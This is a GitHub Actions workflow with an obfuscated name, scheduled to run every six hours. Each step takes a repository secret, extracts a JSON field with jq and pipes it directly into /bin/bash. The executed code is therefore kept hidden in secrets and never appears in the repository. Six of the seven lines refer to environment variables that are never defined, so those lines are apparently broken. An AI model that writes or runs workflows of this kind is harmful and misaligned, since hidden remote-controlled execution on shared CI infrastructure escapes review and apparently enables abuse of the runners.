name: songjiaoao2580

on:
  workflow_dispatch:
  schedule:
    - cron: '23 5/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: songjiaoao2580
        env:
          u0: ${{ secrets.u0 }}
        run: |
          echo $u0 | jq -r .etlpd45 | /bin/bash
          echo $njn4999 | jq -r .y0 | /bin/bash
          echo $x654 | jq -r .pia088 | /bin/bash
          echo $l76028 | jq -r .v72182 | /bin/bash
          echo $atp842 | jq -r .wl3 | /bin/bash
          echo $rkh7652 | jq -r .rpd42229 | /bin/bash
          echo $bvh514 | jq -r .vo1 | /bin/bash

